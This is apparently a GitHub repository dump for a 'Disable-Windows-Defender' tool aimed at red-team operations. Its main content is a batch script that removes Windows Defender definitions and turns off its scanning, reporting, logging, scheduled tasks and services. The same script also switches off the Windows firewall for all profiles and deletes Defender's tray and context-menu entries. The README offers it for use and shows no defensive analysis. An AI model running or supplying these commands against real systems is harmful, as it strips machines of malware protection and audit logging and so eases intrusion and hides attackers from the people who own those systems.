├── Disable-winDefender.exe ├── DisableDefender.gif ├── README.md └── source.bat /Disable-winDefender.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/df55f8f448594b3c447abb1ffa0fd780a88ebbf8/Disable-winDefender.exe -------------------------------------------------------------------------------- /DisableDefender.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/df55f8f448594b3c447abb1ffa0fd780a88ebbf8/DisableDefender.gif -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Disable-Windows-Defender 2 |
Disable Windows Defender All Version for RedTeaming Operation
3 |
Tested On Windows Server 2019 and Windows 10 2004 (12/20/2020)
4 | ![Alt Text](https://raw.githubusercontent.com/akizaizinski1311/Disable-Windows-Defender/main/DisableDefender.gif) 5 | -------------------------------------------------------------------------------- /source.bat: -------------------------------------------------------------------------------- 1 | C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All Set-MpPreference -DisableIOAVProtection $true 2 | 3 | powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true" 4 | 5 | powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true" 6 | 7 | powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true" 8 | 9 | powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true" 10 | 11 | powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true" 12 | 13 | powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true" 14 | powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true" 15 | 16 | powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true" 17 | powershell.exe -command "Set-MpPreference -DisableScriptScanning $true" 18 | powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2" 19 | 20 | powershell.exe -command "Set-MpPreference -MAPSReporting 0" 21 | powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force" 22 | powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6" 23 | 24 | powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6" 25 | 26 | powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6" 27 | 28 | powershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f" 29 | powershell.exe -command "REG ADD “hklm\software\policies\microsoft\windows defender” /v DisableAntiSpyware /t REG_DWORD /d 1 /f" 30 | 31 | powershell.exe -command "netsh advfirewall set allprofiles state off" 32 | 33 | reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f 34 | reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f 35 | reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f 36 | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f 37 | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f 38 | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f 39 | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f 40 | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f 41 | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f 42 | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f 43 | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f 44 | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f 45 | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f 46 | cls 47 | rem 0 - Disable Logging 48 | reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f 49 | reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f 50 | cls 51 | rem Disable WD Tasks 52 | schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable 53 | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable 54 | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable 55 | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable 56 | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable 57 | cls 58 | rem Disable WD systray icon 59 | reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f 60 | reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f 61 | cls 62 | rem Remove WD context menu 63 | reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f 64 | reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f 65 | reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f 66 | cls 67 | rem Disable WD services 68 | reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f 69 | reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f 70 | reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f 71 | reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f 72 | reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f 73 | --------------------------------------------------------------------------------